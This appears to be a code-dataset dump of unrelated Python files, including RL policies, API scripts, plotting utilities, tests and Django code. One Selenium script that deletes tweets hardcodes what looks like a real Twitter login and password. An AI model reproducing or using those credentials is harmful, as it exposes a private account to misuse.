Environment specification.\n module : GaussianMLPModule to make prediction based on a gaussian\n distribution.\n :return:\n\n \"\"\"\n\n def __init__(self, env_spec, **kwargs):\n self._env_spec = env_spec\n self._obs_dim = env_spec.observation_space.flat_dim\n self._action_dim = env_spec.action_space.flat_dim\n\n GaussianMLPModule.__init__(self,\n input_dim=self._obs_dim,\n output_dim=self._action_dim,\n **kwargs)\n\n def forward(self, inputs):\n \"\"\"Forward method.\"\"\"\n return super().forward(inputs)\n\n def get_action(self, observation):\n \"\"\"Get a single action given an observation.\"\"\"\n with torch.no_grad():\n observation = observation.unsqueeze(0)\n dist = self.forward(observation)\n std = dist.variance**0.5\n return dist.rsample().squeeze(0).numpy(), dict(\n mean=dist.mean.squeeze(0), log_std=np.log(std).squeeze(0))\n\n def get_actions(self, observations):\n \"\"\"Get actions given observations.\"\"\"\n with torch.no_grad():\n dist = self.forward(observations)\n std = dist.variance**0.5\n return dist.rsample().detach().numpy(), dict(mean=dist.mean,\n log_std=np.log(std))\n","sub_path":"src/garage/torch/policies/gaussian_mlp_policy.py","file_name":"gaussian_mlp_policy.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"147758379","text":"import requests\r\nimport pandas as pd\r\nimport json\r\nimport numpy as np\r\n\r\nbase_url = \"https://api.oceanex.pro/v1\"\r\n\r\n\r\ndef orderbk(base_url):\r\n market = \"vetusdt\"\r\n limit = 5\r\n method_url = base_url + \"/order_book\"\r\n data = {\"market\": market, \"limit\": limit}\r\n r = requests.post(method_url, data=data)\r\n print(r.text)\r\n tdata = (json.loads(r.text))['data']['asks']\r\n print(\"asks. price with volume\")\r\n for i in (tdata):\r\n print(i)\r\n print(i[0])\r\n print(\"bids. price with volume\")\r\n for i in (tdata):\r\n print(i)\r\n print(i[0])\r\n\r\n\r\norderbk(base_url)\r\n# method_url = base_url + \"/order_book/multi\"\r\n# markets = [\"vetusdt\", \"vetbtc\"]\r\n# limit = 5\r\n# data = {\r\n# \"markets[]\": markets,\r\n# \"limit\": limit\r\n# }\r\n# r = requests.post(method_url, data=data)\r\n# print(r.text)\r\n","sub_path":"orderbook.py","file_name":"orderbook.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"565776832","text":"\n\"\"\" continue\n1부터 10까지의 숫자 중에서 \"홀수\"만 출력하는 while문\n\nnum가 짝수이면 print(a)는 수행되지 않을\n\"\"\"\n\nnum = 0\nwhile num < 10:\n num = num+1\n if num % 2 == 0: # 짝수일 때\n continue\n print(num)\n","sub_path":"PythonMain/src/ch04-operation/ch-while/ex05.py","file_name":"ex05.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248296894","text":"\"\"\"\nGiven an array where elements are sorted in ascending order, convert it to a height balanced BST.\nSource: https://leetcode.com/problems/convert-sorted-array-to-binary-search-tree/#/description\n\"\"\"\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\n#DO NOT CHANGE THIS CLASS\nclass Solution(object):\n def sortedArrayToBST(self, nums):\n #YOUR CODE GOES HERE\n ##\n if(len(nums) == 1):\n self.val = nums[0]\n return self\n elif(len(nums) == 2):\n self.val = nums[0]\n self.right = TreeNode(None)\n self.right.val = nums[1]\n self.left = TreeNode(None)\n self.left = None\n return self\n else:\n cut = int(len(nums)/2)\n self.val = nums[cut]\n self.left = TreeNode(None)\n self.left = Solution.sortedArrayToBST(self.left, nums[0:cut])\n self.right = TreeNode(None)\n self.right = Solution.sortedArrayToBST(self.right, nums[cut+1:])\n return self \n \n \n \n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n \"\"\"\n\n# stump = TreeNode(None)\n# testList = [0,1,2,3,4,5,6,7]\n# stump = Solution.sortedArrayToBST(stump,testList)\n","sub_path":"problem_6/Fellow Codes Go Here/goodman_aaron.py","file_name":"goodman_aaron.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"234125952","text":"import os\nimport json\nimport tempfile\nimport subprocess\nfrom ruamel.yaml import YAML\nfrom ruamel.yaml.scanner import ScannerError\nfrom contextlib import contextmanager\n\nyaml = YAML(typ='safe', pure=True)\n\n@contextmanager\ndef decrypt_file(encrypted_path):\n \"\"\"\n Provide secure temporary decrypted contents of a given file\n\n If file isn't a sops encrypted file, we assume no encryption is used\n and return the current path.\n \"\"\"\n # We must first determine if the file is using sops\n # sops files are JSON/YAML with a `sops` key. So we first check\n # if the file is valid JSON/YAML, and then if it has a `sops` key\n with open(encrypted_path) as f:\n _, ext = os.path.splitext(encrypted_path)\n # Support the (clearly wrong) people who use .yml instead of .yaml\n if ext == '.yaml' or ext == '.yml':\n try:\n encrypted_data = yaml.load(f)\n except ScannerError:\n yield encrypted_path\n return\n elif ext == '.json':\n try:\n encrypted_data = json.load(f)\n except json.JSONDecodeError:\n yield encrypted_path\n return\n\n if 'sops' not in encrypted_data:\n yield encrypted_path\n return\n\n # If file has a `sops` key, we assume it's sops encrypted\n with tempfile.NamedTemporaryFile() as f:\n subprocess.check_call([\n 'sops',\n '--output', f.name,\n '--decrypt', encrypted_path\n ])\n yield f.name","sub_path":"deployer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"269612410","text":"from utils import *\n\ndef grid_values(grid):\n # In this function, you will take a sudoku as a string\n # and return a dictionary where the keys are the boxes,\n # for example 'A1', and the values are the digit at each\n # box (as a string) or '.' if the box has no value\n # assigned yet.\n res = dict()\n\n for i,c in enumerate(grid):\n k = boxes[i]\n res[k] = c \n \n return res\n \nvalues = \"..3.2.6..9..3.5..1..18.64....81.29..7.......8..67.82....26.95..8..2.3..9..5.1.3..\"\ng = grid_values(values)\ndisplay(g)","sub_path":"AIND/lesson3/4/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"366513181","text":"from torch import cuda\nfrom onmt.trainer import Trainer\nfrom onmt.utils import ReportMgr\nfrom onmt.inputters import corpus, inputter, dynamic_iterator\nfrom config import defaults\n\nfrom onmt.models.model import NMTModel\nfrom onmt.utils.loss import NMTLossCompute\nfrom onmt.utils.optimizers import Optimizer\nfrom src.utils.dataset import Dataset\n\n\ndef training_iterator(ds: Dataset, vocab):\n # build the ParallelCorpus\n train = corpus.ParallelCorpus(\"corpus\", ds.train.source, ds.train.target)\n valid = corpus.ParallelCorpus(\"valid\", ds.val.source, ds.val.target)\n\n # build the training iterator\n iterator = dynamic_iterator.DynamicDatasetIter(\n corpora={\"corpus\": train},\n corpora_info={\"corpus\": {\"weight\": 1}},\n transforms={},\n fields=vocab,\n is_train=True,\n batch_type=\"tokens\",\n batch_size=4096,\n batch_size_multiple=1,\n data_type=\"text\")\n\n # build the validation iterator\n validator = dynamic_iterator.DynamicDatasetIter(\n corpora={\"valid\": valid},\n corpora_info={\"valid\": {\"weight\": 1}},\n transforms={},\n fields=vocab,\n is_train=False,\n batch_type=\"sents\",\n batch_size=8,\n batch_size_multiple=1,\n data_type=\"text\")\n \n # make sure the iteration happens on GPU 0 (-1 for CPU, N for GPU N)\n iterator = iter(inputter.IterOnDevice(iterator, 0 if cuda.is_available() else -1))\n validator = iter(inputter.IterOnDevice(validator, 0 if cuda.is_available() else -1))\n\n return iterator, validator\n\n\ndef training_session(model: NMTModel, loss: NMTLossCompute, opt: Optimizer, dropout: float = defaults.dropout):\n report_manager = ReportMgr(report_every=50, start_time=None, tensorboard_writer=None)\n session = Trainer(\n model=model,\n train_loss=loss,\n valid_loss=loss,\n optim=opt,\n report_manager=report_manager,\n dropout=dropout)\n\n return session","sub_path":"src/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"196137323","text":"import requests\r\nimport json\r\n\r\n# 数据接口\r\nurl = 'https://view.inews.qq.com/g2/getOnsInfo?name=disease_h5'\r\n# 读取数据转换为 JSON 格式\r\ndata = json.loads(requests.get(url).json()['data'])\r\n# 更新时间\r\nupdate_time = data['lastUpdateTime']\r\n# 全国数据\r\nchina_total = data['chinaTotal']\r\n# 全国各地具体数据\r\nChina = data['areaTree'][0]['children']\r\n\r\n# 将数据生成为副标题\r\nncp_info = '确诊:{} 疑似:{} 死亡:{} 治愈:{} 更新日期:{}'.format(\r\n china_total['confirm'],\r\n china_total['suspect'],\r\n china_total['dead'],\r\n china_total['heal'],\r\n update_time\r\n )\r\n\r\nprint(ncp_info)\r\n\r\nfrom pyecharts.charts import Map, Geo\r\nfrom pyecharts import options as opts\r\nfrom pyecharts.globals import GeoType\r\n\r\nc = (\r\n Geo()\r\n .add_schema(\r\n maptype='china',\r\n # 设置地图区域颜色\r\n itemstyle_opts=opts.ItemStyleOpts(color=\"#323c48\", border_color=\"#111\"),\r\n )\r\n .add(\r\n 'geo',\r\n # 序列数据,添加省会名称以及确诊数量\r\n [list([China[i]['name'], China[i]['total']['confirm']]) for i in range(len(China))],\r\n # 设置涟漪效果\r\n type_=GeoType.EFFECT_SCATTER,\r\n )\r\n .set_series_opts(\r\n # 不显示 Label\r\n label_opts=opts.LabelOpts(is_show=False),\r\n )\r\n .set_global_opts(\r\n # 设置标题,副标题,放置中间\r\n title_opts=opts.TitleOpts(title=\"全国疫情地图\", subtitle=ncp_info, pos_left='center'),\r\n # 设置渐变,最大值设为 平均值\r\n visualmap_opts=opts.VisualMapOpts(min_=0, max_=china_total['confirm']/len(data)),\r\n # 不显示图例\r\n legend_opts=opts.LegendOpts(is_show=False)\r\n )\r\n)\r\n\r\n# 保存地图\r\nc.render(\"./epidemic_provinces_map.html\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382874772","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException\nfrom time import sleep\nimport json\nimport datetime\n\ndriver = webdriver.Safari()\n# driver.implicitly_wait(10)\n\ndriver.get(\"https://twitter.com/gunnertech\")\nsleep(1)\n# driver.set_window_size(1, 1)\ndriver.find_element_by_css_selector(\"div.LoginForm-username input\").send_keys(\"gunnertech\")\ndriver.find_element_by_css_selector(\"div.LoginForm-password input\").send_keys(\"Twi2010!!\")\ndriver.find_element_by_css_selector(\"form.js-front-signin input.js-submit\").click()\n\nwhile True:\n sleep(1)\n for button in driver.find_elements_by_css_selector(\"button.ProfileTweet-actionButton.js-dropdown-toggle\"):\n button.click()\n sleep(1)\n driver.find_element_by_css_selector(\"li.js-actionDelete button\").click()\n sleep(1)\n driver.find_element_by_css_selector(\"button.delete-action\").click()\n sleep(1)\n driver.refresh()\n\nprint('all done here')\ndriver.close()\n","sub_path":"delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"32809454","text":"from __future__ import absolute_import, unicode_literals\n\n# standard library\nimport json\nfrom typing import Any, Dict\n\n# third-party\nfrom celery import shared_task\n\n# local Django\nfrom apps.product.models import ReportProduct\n\n\n@shared_task\ndef generate_day_report(data: Dict[str, Any]):\n \"\"\"\n ...\n \"\"\"\n\n # COUNT\n\n total_count: int = 0\n\n # DAY\n\n day_summary = []\n\n for number in range(24):\n # print(day_number + 1)\n hour = \"\"\n\n if len(str(number)) == 2 and number >= 10:\n hour = f\"{number}:00:00\"\n else:\n hour = f\"0{number}:00:00\"\n\n day_summary.append({\"hour\": hour, \"count\": 0})\n\n report = ReportProduct.objects.create(\n rformat=\"D\",\n total=json.dumps({\"total_count\": total_count}),\n summary=json.dumps({\"day_summary\": day_summary}),\n )\n report_id = report.id\n return f\"day report completed id: {report_id}\"\n","sub_path":"apps/product/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"297305059","text":"import os\nimport torch\nimport math\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom torch import nn\nfrom os import path\nfrom IPython import display\nimport time\n\n\ntorch.manual_seed(12345)\nmin_x, max_x, delta_x = None, None, None\n\n\ndef set_default(figsize=(10, 10)):\n plt.style.use(['dark_background', 'bmh'])\n plt.rc('axes', facecolor='k')\n plt.rc('figure', facecolor='k')\n plt.rc('figure', figsize=figsize)\n\n\ndef get_data(n=1000, d=2, c=3, std=0.2):\n X = torch.zeros(n * c, d)\n y = torch.zeros(n * c, dtype=torch.long)\n for i in range(c):\n index = 0\n r = torch.linspace(0.2, 1, n)\n t = torch.linspace(\n i * 2 * math.pi / c,\n (i + 2) * 2 * math.pi / c,\n n\n ) + torch.randn(n) * std\n\n for ix in range(n * i, n * (i + 1)):\n X[ix] = r[index] * torch.FloatTensor((\n math.sin(t[index]), math.cos(t[index])\n ))\n y[ix] = i\n index += 1\n return X, y\n\n\ndef plot_data(X, y, ratio='1:1', d=0, zoom=1, save_path=None):\n plt.scatter(X.numpy()[:, 0], X.numpy()[:, 1], c=y, s=20, cmap=plt.cm.Spectral)\n plt.axis('square')\n if ratio == '1:1': plt.axis(np.array((-1.1, 1.1, -1.1, 1.1)) * zoom)\n elif ratio == '16:9': plt.axis(np.array((-2.0, 2.0, -2 / 16 * 9, 2 / 16 * 9)) * zoom)\n else: raise ValueError('Ratio not supported')\n plt.axis('off')\n\n _m, _c = 0, '.15'\n plt.axvline(0, ymin=_m, color=_c, lw=1, zorder=0)\n plt.axhline(0, xmin=_m, color=_c, lw=1, zorder=0)\n if save_path: plt.savefig(f'{save_path}{d:04d}.png')\n\n\ndef plot_curves(fig, ax, acc_hist, loss_hist):\n ax1, ax2 = ax\n ax1.cla(); ax2.cla()\n ax1.plot(acc_hist, 'C0')\n ax2.plot(loss_hist, 'C1')\n ax1.set_ylabel('Accuracy', color='C0')\n ax2.set_ylabel('Loss', color='C1')\n fig.canvas.draw()\n\n\ndef train(model, X, y, fig, ax, max_epochs=3000):\n # Or train from scratch\n criterion = torch.nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)\n\n acc_hist = list()\n loss_hist = list()\n\n # Training\n for t in range(max_epochs + 1):\n\n # Feed forward to get the logits\n perm = torch.randperm(X.size(0))\n y_pred = model(X[perm])\n\n # Compute the loss and accuracy\n loss = criterion(y_pred, y[perm])\n score, predicted = torch.max(y_pred.data, 1)\n correct = (y[perm] == predicted).int().sum().item()\n acc = correct / len(y)\n\n print(\"[EPOCH]: %i, [LOSS]: %.6f, [ACCURACY]: %.3f\" % (t, loss.item(), acc))\n display.clear_output(wait=True)\n acc_hist.append(acc)\n loss_hist.append(loss.item())\n if t % 100 == 0 or correct - len(y) == 0 and t % 100 == 0:\n plot_curves(fig, ax, acc_hist, loss_hist)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if correct - len(y) == 0: break\n return acc_hist, loss_hist\n\n\ndef get_model(model_name, c=3):\n modules = list()\n if model_name == '5-Linear-4-LeakyReLU':\n for l in range(4):\n modules.append(nn.Linear(2, 2))\n modules.append(nn.LeakyReLU())\n modules.append(nn.Linear(2, 2))\n elif model_name == '2-Linear_H-100' or model_name == 'K-5_2-Linear_H-100':\n modules.append(nn.Linear(2, 100))\n modules.append(nn.LeakyReLU())\n modules.append(nn.Linear(100, 2))\n elif model_name == '1-Linear':\n modules.append(nn.Linear(2, 2))\n else: raise ValueError('Model name not existent')\n modules.append(nn.Linear(2, c))\n model = nn.Sequential(*modules)\n model.load_state_dict(torch.load(path.join(model_name, 'model_dict.pth')))\n acc_hist, loss_hist = torch.load(path.join(model_name, 'acc_loss.pth'))\n return model, (acc_hist, loss_hist)\n\n\ndef save_model(model_path, model, hist=None):\n if path.isdir(model_path):\n raise FileExistsError('Model directory already existent. Aborting.')\n os.mkdir(model_path)\n torch.save(model, path.join(model_path, 'model.pth'))\n torch.save(model.state_dict(), path.join(model_path, 'model_dict.pth'))\n if hist is not None:\n torch.save(hist, path.join(model_path, 'acc_loss.pth'))\n print(model_path, 'saved successfully.')\n\n\ndef plot_decision(model):\n mesh = np.arange(-1.1, 1.1, 0.01)\n xx, yy = np.meshgrid(mesh, mesh)\n with torch.no_grad():\n data = torch.tensor(np.vstack((xx.reshape(-1), yy.reshape(-1))).T).float()\n Z = model(data).detach()\n Z = np.argmax(Z, axis=1).reshape(xx.shape)\n plt.contourf(xx, yy, Z, cmap=plt.cm.Spectral, alpha=0.3)\n\n\ndef get_grid(ratio):\n global min_x, max_x, delta_x\n if ratio == '1:1':\n min_x, max_x, delta_x = -5.5, 5.5, .1\n min_y, max_y, delta_y = -5.5, 5.5, .1\n elif ratio == '16:9':\n min_x, max_x, delta_x = -10, 10, .1\n min_y, max_y, delta_y = -5.6, 5.6, .1\n else: raise ValueError('Ratio not supported')\n\n mesh_x = np.arange(min_x, max_x + delta_x, delta_x)\n mesh_y = np.arange(min_y, max_y + delta_y, delta_y)\n xx, yy = np.meshgrid(mesh_x, mesh_y)\n data = torch.tensor(np.vstack((xx.reshape(-1), yy.reshape(-1))).T).float()\n return data\n\n\ndef plot_grid(data):\n N_x = int((max_x - min_x) / delta_x + 1)\n d = data.numpy().reshape(-1, N_x, 2)\n x, y = d[:,:,0], d[:,:,1]\n plt.plot(x, y, c='.5', lw=1, zorder=0)\n plt.plot(x.T, y.T, c='.5', lw=1, zorder=0)\n\n\ndef plot_bases(bases, plotting=True, width=0.04):\n bases[2:] -= bases[:2]\n # if plot_bases.a: plot_bases.a.set_visible(False)\n # if plot_bases.b: plot_bases.b.set_visible(False)\n if plotting:\n plot_bases.a = plt.arrow(*bases[0], *bases[2], width=width, color='r', zorder=10, alpha=1., length_includes_head=True)\n plot_bases.b = plt.arrow(*bases[1], *bases[3], width=width, color='g', zorder=10, alpha=1., length_includes_head=True)\n\n\nplot_bases.a = None\nplot_bases.b = None\n\n\ndef in_out_interpolation(module, X_in, y, steps, action):\n I = torch.eye(2)\n X_in = torch.cat((I * 0, I, X_in))\n with torch.no_grad():\n X_out = module(X_in)\n interpolate(X_in, X_out, y, steps, action, plotting_bases=isinstance(module, nn.Linear))\n return X_out[4:]\n\n\ncount = 0\n\n\ndef interpolate(\n X_in, X_out, y, steps, action, p=1/50, plotting_bases=False,\n plotting_grid=False, K=3, ratio='1:1', single=False\n):\n global count\n N = K * 1000 + 4\n for t in range(steps):\n # a = (t / (steps - 1)) ** p\n a = ((p + 1)**(t / (steps - 1)) - 1) / p\n plt.gca().cla()\n plt.text(0, 5, action, color='w', horizontalalignment='center', verticalalignment='center')\n plot_data(a * X_out[4:N] + (1 - a) * X_in[4:N], y, zoom=5, ratio=ratio) #, d=steps*i+t)\n plot_bases(a * X_out[:4] + (1 - a) * X_in[:4], plotting=plotting_bases)\n if plotting_grid: plot_grid(a * X_out[N:] + (1 - a) * X_in[N:])\n plt.gcf().canvas.draw()\n # plt.savefig(f'/Users/atcold/Scratch/Spiral/in_out_K-5_2-Linear_H-100/{t:04d}.png')\n # plt.savefig(f'/Users/atcold/Scratch/Spiral/in_out_2-Linear-noise/{t:04d}.png')\n # plt.savefig(f'/Users/atcold/Scratch/Spiral/in_out_per_transformation/{count:04d}.png')\n count += 1\n plt.gcf().canvas.set_window_title(f'{t + 1}/{steps}')\n if not single:\n time.sleep(0.5)\n # for z in range(15):\n # plt.savefig(f'/Users/atcold/Scratch/Spiral/in_out_per_transformation/{count:04d}.png')\n # count += 1\n I = torch.eye(2)\n plot_bases(torch.cat((I * 0, I)), plotting=not plotting_bases)\n plt.gcf().canvas.draw()\n # for z in range(15):\n # plt.savefig(f'/Users/atcold/Scratch/Spiral/in_out_per_transformation/{count:04d}.png')\n # count += 1\n time.sleep(0.5)\n\n\ndef interpolate_rot(X_in, y, steps, M):\n global count\n theta = torch.atan2(M[1, 0], M[0, 0])\n I = torch.eye(2)\n X_in = torch.cat((I * 0, I, X_in))\n for t in range(steps):\n alpha = t / (steps - 1) * theta\n R = torch.tensor([\n [torch.cos(alpha), -torch.sin(alpha)],\n [torch.sin(alpha), torch.cos(alpha)]\n ])\n plt.gca().cla()\n plt.text(0, 5, 'Rotating', color='w', horizontalalignment='center', verticalalignment='center')\n plot_data(X_in[4:] @ R, y, zoom=5) # , d=steps*i+t)\n plot_bases(X_in[:4] @ R)\n plt.gcf().canvas.draw()\n # plt.savefig(f'/Users/atcold/Scratch/Spiral/in_out_per_transformation/{count:04d}.png')\n count += 1\n X_out = X_in[4:] @ R\n time.sleep(0.5)\n # for z in range(15):\n # plt.savefig(f'/Users/atcold/Scratch/Spiral/in_out_per_transformation/{count:04d}.png')\n # count += 1\n plot_bases(torch.cat((I * 0, I)), plotting=False)\n plt.gcf().canvas.draw()\n time.sleep(0.5)\n # for z in range(15):\n # plt.savefig(f'/Users/atcold/Scratch/Spiral/in_out_per_transformation/{count:04d}.png')\n # count += 1\n\n # Reflection?\n if torch.det(M) < 0:\n F = torch.pinverse(R) @ M\n X_in = torch.cat((I * 0, I, X_out))\n X_out = X_in @ F\n interpolate(X_in, X_out, y, steps, 'Reflecting', plotting_bases=True)\n X_out = X_out[4:]\n\n return X_out\n\n\ndef animate(module, X_in, y, steps, decompose=False):\n if isinstance(module, nn.Linear) and decompose:\n X_out = decompose_affine_transformation(module, X_in, y, steps)\n # X_out = in_out_interpolation(module, X_in, steps, module.__class__.__name__)\n else:\n X_out = in_out_interpolation(module, X_in, y, steps, module.__class__.__name__)\n return X_out\n\n\ndef decompose_affine_transformation(module, X_in, y, steps):\n A = module._parameters.get('weight').data # get tensor out of Parameter\n b = module._parameters.get('bias').data # get tensor out of Parameter\n U, S, V = torch.svd(A) # rotation, non-uniform scaling, rotation\n S = torch.diag(S) # A = U @ S @ V'\n steps = int(steps / 2)\n I = torch.eye(2)\n\n # Full affine transformation\n # X_out = X_in @ A' + b = X_in @ V @ S @ U' + b\n\n # Rotation 1\n X_out = interpolate_rot(X_in, y, steps, V)\n X_in = X_out\n\n # Scaling\n X_in = torch.cat((I * 0, I, X_in))\n X_out = X_in @ S\n interpolate(X_in, X_out, y, steps, 'Scaling', plotting_bases=True)\n X_in = X_out[4:]\n\n # Rotation 2\n X_out = interpolate_rot(X_in, y, steps, U.t())\n X_in = X_out\n\n # Translation\n X_in = torch.cat((I * 0, I, X_in))\n X_out = X_in + b\n interpolate(X_in, X_out, y, steps, 'Translating', plotting_bases=True)\n\n return X_out[4:]\n\n\ndef plot_output_decision(model, ratio):\n if ratio == '1:1': mesh = np.arange(-5.5, 5.5, 0.01)\n elif ratio == '16:9': mesh = np.arange(-10, 10, 0.01)\n else: raise ValueError('Ratio not supported')\n\n xx, yy = np.meshgrid(mesh, mesh)\n with torch.no_grad():\n data = torch.tensor(np.vstack((xx.reshape(-1), yy.reshape(-1))).T).float()\n output_layer_idx = list(model._modules.keys())[-1]\n Z = model._modules[output_layer_idx](data)\n Z = np.argmax(Z, axis=1).reshape(xx.shape)\n plt.contourf(xx, yy, Z, cmap=plt.cm.Spectral, alpha=0.3)\n\n\ndef play_in_out(model, X, y, steps, K=3, ratio='1:1', p=2):\n grid = get_grid(ratio=ratio)\n warm_up(X, y, grid, ratio=ratio)\n\n I = torch.eye(2)\n X_in_bak = torch.cat((I * 0, I, X, grid))\n X_in = X_in_bak\n for i in range(len(model._modules) - 1):\n module = model._modules[str(i)]\n with torch.no_grad():\n X_out = module(X_in)\n X_in = X_out\n interpolate(X_in_bak, X_out, y, steps, '', p=p, plotting_grid=True, K=K,\n ratio=ratio, single=True)\n\n\ndef play_layer_by_layer(model, X, y, steps, decompose=False):\n warm_up(X, y, plotting_bases=True)\n X_in = X\n for i in range(len(model._modules) - 1):\n module = model._modules[str(i)]\n X_in = animate(module, X_in, y, steps, decompose)\n\n\ndef warm_up(X, y, grid=None, plotting_bases=False, ratio='1:1'):\n # Warm up\n plt.gca().cla()\n plot_data(X, y, zoom=5, ratio=ratio)\n I = torch.eye(2)\n if plotting_bases: plot_bases(torch.cat((I * 0, I)))\n if grid is not None: plot_grid(grid)\n plt.gcf().canvas.draw()\n time.sleep(5)\n\n\ndef plot_output_data(model, X, y, ratio):\n X_in = X\n for i in range(len(model._modules) - 1):\n module = model._modules[str(i)]\n with torch.no_grad():\n X_out = module(X_in)\n X_in = X_out\n plot_data(X_out, y, ratio, zoom=5)\n\n\nzieger = plt.imread('ziegler.png')\n\n\ndef show_scatterplot(X, colors, title='', axis=True):\n colors = zieger[colors[:,0], colors[:,1]]\n X = X.numpy()\n # plt.figure()\n plt.axis('equal')\n plt.scatter(X[:, 0], X[:, 1], c=colors, s=30)\n # plt.grid(True)\n plt.title(title)\n plt.axis('off')\n _m, _c = 0, '.15'\n if axis:\n plt.axvline(0, ymin=_m, color=_c, lw=1, zorder=0)\n plt.axhline(0, xmin=_m, color=_c, lw=1, zorder=0)\n","sub_path":"part2/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"212935312","text":"from django.contrib import admin\n\n# Register your models here.\nfrom clubs.models import Club\n\n\nclass ClubAdmin(admin.ModelAdmin):\n fields = ['id', 'name', 'profile_medium', 'profile', 'cover_photo',\n 'cover_photo_small', 'description', 'club_type', 'sport_type',\n 'city', 'state', 'country', 'url', 'members']\n search_fields = ['name', 'description']\n ordering = ['name']\n list_display = ['id', 'name']\n\n\n\nadmin.site.register(Club, ClubAdmin)\n\n","sub_path":"StravaClub/clubs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"249915166","text":"#!/usr/bin/env python3 -B\nimport unittest\n\nfrom tests import TestKnoedlerPipelineOutput, classified_identifiers, classification_sets\nfrom cromulent import vocab\n\nvocab.add_attribute_assignment_check()\n\nclass PIRModelingTest_AR86(TestKnoedlerPipelineOutput):\n def test_modeling_ar86(self):\n '''\n AR-86: Improve modeling of unsold purchases and inventorying\n '''\n output = self.run_pipeline('ar86')\n activities = output['model-activity']\n\n # There are three entries for this object (with transaction types \"unsold\", \"unsold\", and \"sold\").\n # From these entries, we should see:\n # - 1 purchase event (\"unsold\" but with seller information)\n # - 2 inventorying event (\"unsold\" but no seller information, and also \"sold\" with no seller information)\n # - 1 sale event (\"sold\")\n\n k_purchases = [a for a in activities.values() if a.get('_label', '').startswith('Knoedler Purchase of Stock Number 5323')]\n self.assertEqual(len(k_purchases), 1)\n\n k_inventorying = [a for a in activities.values() if a.get('_label', '').startswith('Knoedler Inventorying of Stock Number 5323')]\n self.assertEqual(len(k_inventorying), 2)\n\n k_sales = [a for a in activities.values() if a.get('_label', '').startswith('Knoedler Sale of Stock Number 5323')]\n self.assertEqual(len(k_sales), 1)\n\n # Also, the two inventorying events should have price information representing Knoedler's evaluated worth of the object\n # In this case, both inventorying activities resulted in the same evaluated amount (1250 francs).\n for act in k_inventorying:\n assignments = [a for a in act.get('part', []) if a.get('_label', '').startswith('Evaluated worth of Stock Number 5323')]\n self.assertEqual(len(assignments), 1)\n assignment = assignments[0]\n\n self.assertTrue(assignment['_label'].startswith('Evaluated worth of Stock Number 5323'))\n self.assertEqual(assignment['assigned_property'], 'dimension')\n self.assertEqual(assignment['assigned'][0]['_label'], '1,250.00 francs')\n self.assertEqual(assignment['assigned_to']['_label'], '[Language of fair title info from Sales Book 7, 1892-1900, f.36]')\n self.assertEqual(classification_sets(assignment['assigned'][0]), {'Valuation'})\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_knoedler_issue_ar86.py","file_name":"test_knoedler_issue_ar86.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"355631519","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: root\n\"\"\"\n\nimport time\nfrom smbus2 import SMBus\nfrom smbus2 import SMBusWrapper \nfrom ctypes import *\n\ntgtAddress = 0x0B\nSBSCurrent = 0x0A\nSBSAveCurrent = 0x0B\n\nvoltcmd = 0x09\n\ndef printHex(data):\n hexChar = ''\n for val in data:\n hexChar += format('0x%02x ' % val) \n\ncommObj = SMBus(2)\nif commObj == None:\n print('Not able to open driver')\n quit()\n\ncurList = list()\navecurList = list()\ncur = c_short()\nfor i in range(100): \n# volts = commObj.read_word_data(tgtAddress, voltcmd)\n# print('Voltage: ', volts)\n# time.sleep(1.0)\n\n commObj.write_i2c_block_data(tgtAddress, 0x44, [2,2,0])\n verString = commObj.read_i2c_block_data(tgtAddress, 0x44, 13)\n# print( ' '.join( [ \"%02x\" % ord (x) for x in verString ] ))\n\n#for x in verString:\n# print('0x%x ' % x, end=\"\")\n\n\nprint('\\n')\n\n\ncommObj.close()\n","sub_path":"py/voltage.py","file_name":"voltage.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"541884717","text":"#-*- coding: utf-8 -*-\n\nfrom django.contrib import admin\nfrom profiles.models import *\n# Register your models here.\n\n\nclass PersonInline(admin.StackedInline):\n\tmodel = 